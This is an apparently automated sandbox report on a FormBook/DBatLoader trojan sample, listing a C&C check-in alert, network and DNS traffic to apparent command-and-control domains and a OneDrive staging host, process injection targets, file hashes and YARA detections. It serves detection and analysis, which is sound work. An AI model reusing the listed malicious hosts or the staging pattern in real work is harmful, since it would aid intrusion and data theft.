11/29/22-18:26:23.800962 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 52.85.92.84
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 18:24:02.150501013 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.150546074 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.150648117 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.152163029 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.152179956 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.254343033 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.254555941 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.255497932 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.255589962 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.267853975 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.267887115 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.268393040 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.268481970 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.269418001 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.269438982 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.500678062 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.500714064 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.500811100 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.500822067 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.500838041 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.500870943 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.500896931 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.500904083 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.500924110 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.500952005 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.500967026 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.500974894 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.501029968 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526240110 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526367903 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526443005 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526479006 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526498079 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526504993 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526525021 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526536942 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526561975 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526582003 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526590109 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526628017 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526633024 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526657104 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526691914 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526717901 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526727915 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526765108 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526782990 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526839972 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.526849031 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.526925087 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554421902 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554553032 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554594040 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554619074 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554632902 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554657936 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554661036 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554682970 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554713964 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554738998 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554744959 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554785967 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554790974 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554811954 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554847002 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554872990 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554893017 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.554939032 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.554979086 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555042028 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555049896 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555092096 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555105925 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555126905 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555171967 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555187941 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555192947 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555222988 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555227995 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555243969 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555279016 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555296898 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555304050 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555342913 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555367947 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555430889 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.555437088 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.555522919 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.577827930 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.578022003 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.578116894 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.578166008 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.578205109 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.578243017 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.578641891 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.578684092 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.578753948 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.578780890 CET | 443 | 49708 | 13.107.43.12 | 192.168.2.5
Nov 29, 2022 18:24:02.578811884 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Nov 29, 2022 18:24:02.578839064 CET | 49708 | 443 | 192.168.2.5 | 13.107.43.12
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 18:24:01.159205914 CET | 49724 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:24:02.097614050 CET | 61452 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:26:08.541414976 CET | 59220 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:26:08.563268900 CET | 53 | 59220 | 8.8.8.8 | 192.168.2.5
Nov 29, 2022 18:26:13.612112999 CET | 55068 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:26:13.632412910 CET | 53 | 55068 | 8.8.8.8 | 192.168.2.5
Nov 29, 2022 18:26:18.722286940 CET | 56682 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:26:18.742017984 CET | 53 | 56682 | 8.8.8.8 | 192.168.2.5
Nov 29, 2022 18:26:23.756469965 CET | 58532 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:26:23.777184010 CET | 53 | 58532 | 8.8.8.8 | 192.168.2.5
Nov 29, 2022 18:26:28.831734896 CET | 62659 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:26:28.853539944 CET | 53 | 62659 | 8.8.8.8 | 192.168.2.5
Nov 29, 2022 18:26:33.864237070 CET | 56263 | 53 | 192.168.2.5 | 8.8.8.8
Nov 29, 2022 18:26:33.889528990 CET | 53 | 56263 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 18:24:01.159205914 CET | 192.168.2.5 | 8.8.8.8 | 0x3277 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:24:02.097614050 CET | 192.168.2.5 | 8.8.8.8 | 0xb4c2 | Standard query (0) | ppqfqw.ph.files.1drv.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:08.541414976 CET | 192.168.2.5 | 8.8.8.8 | 0xcc02 | Standard query (0) | www.librairie-adrienne.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:13.612112999 CET | 192.168.2.5 | 8.8.8.8 | 0x953a | Standard query (0) | www.rematedeldia.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:18.722286940 CET | 192.168.2.5 | 8.8.8.8 | 0xb26a | Standard query (0) | www.thecuratedpour.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.756469965 CET | 192.168.2.5 | 8.8.8.8 | 0x5846 | Standard query (0) | www.customapronsnow.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:28.831734896 CET | 192.168.2.5 | 8.8.8.8 | 0xae1 | Standard query (0) | www.segurofunerarioar.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:33.864237070 CET | 192.168.2.5 | 8.8.8.8 | 0x5457 | Standard query (0) | www.kuechenpruefer.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 18:24:01.202867985 CET | 8.8.8.8 | 192.168.2.5 | 0x3277 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:24:02.146754980 CET | 8.8.8.8 | 192.168.2.5 | 0xb4c2 | No error (0) | ppqfqw.ph.files.1drv.com | ph-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:24:02.146754980 CET | 8.8.8.8 | 192.168.2.5 | 0xb4c2 | No error (0) | ph-files.fe.1drv.com | odc-ph-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:24:02.146754980 CET | 8.8.8.8 | 192.168.2.5 | 0xb4c2 | No error (0) | l-0003.l-dc-msedge.net |  | 13.107.43.12 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:08.563268900 CET | 8.8.8.8 | 192.168.2.5 | 0xcc02 | No error (0) | www.librairie-adrienne.com | librairie-adrienne.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:26:08.563268900 CET | 8.8.8.8 | 192.168.2.5 | 0xcc02 | No error (0) | librairie-adrienne.com |  | 192.0.78.141 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:08.563268900 CET | 8.8.8.8 | 192.168.2.5 | 0xcc02 | No error (0) | librairie-adrienne.com |  | 192.0.78.240 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:13.632412910 CET | 8.8.8.8 | 192.168.2.5 | 0x953a | No error (0) | www.rematedeldia.com | compralo1234.myshopify.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:26:13.632412910 CET | 8.8.8.8 | 192.168.2.5 | 0x953a | No error (0) | compralo1234.myshopify.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 18:26:13.632412910 CET | 8.8.8.8 | 192.168.2.5 | 0x953a | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:18.742017984 CET | 8.8.8.8 | 192.168.2.5 | 0xb26a | Name error (3) | www.thecuratedpour.com | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com |  | 52.85.92.84 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com |  | 52.85.92.99 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com |  | 52.85.92.94 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:23.777184010 CET | 8.8.8.8 | 192.168.2.5 | 0x5846 | No error (0) | www.customapronsnow.com |  | 52.85.92.122 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:28.853539944 CET | 8.8.8.8 | 192.168.2.5 | 0xae1 | Name error (3) | www.segurofunerarioar.com | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2022 18:26:33.889528990 CET | 8.8.8.8 | 192.168.2.5 | 0x5457 | No error (0) | www.kuechenpruefer.com |  | 217.160.0.95 | A (IP address) | IN (0x0001) | false
• ppqfqw.ph.files.1drv.com


Target ID: 0
Start time: 18:23:55
Start date: 29/11/2022
Path: C:\Users\user\Desktop\0321423605241625.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\0321423605241625.exe
Imagebase: 0x400000
File size: 750592 bytes
MD5 hash: EDB1382C354EC6C09C53473E5335703A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 1
Start time: 18:24:02
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\colorcpl.exe
Imagebase: 0x1140000
File size: 86528 bytes
MD5 hash: 746F3B5E7652EA0766BA10414D317981
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

Target ID: 2
Start time: 18:24:05
Start date: 29/11/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff69bc80000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

Target ID: 3
Start time: 18:24:14
Start date: 29/11/2022
Path: C:\Users\Public\Libraries\Mwqrxeuz.exe
Wow64 process (32bit): true
Commandline: "C:\Users\Public\Libraries\Mwqrxeuz.exe"
Imagebase: 0x7ff7fcd70000
File size: 750592 bytes
MD5 hash: EDB1382C354EC6C09C53473E5335703A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 36%, ReversingLabs
Reputation: low

Target ID: 4
Start time: 18:24:18
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\colorcpl.exe
Imagebase: 0x1140000
File size: 86528 bytes
MD5 hash: 746F3B5E7652EA0766BA10414D317981
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 9
Start time: 18:25:26
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\raserver.exe
Imagebase: 0x870000
File size: 108544 bytes
MD5 hash: 2AADF65E395BFBD0D9B71D7279C8B5EC
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

Target ID: 10
Start time: 18:25:37
Start date: 29/11/2022
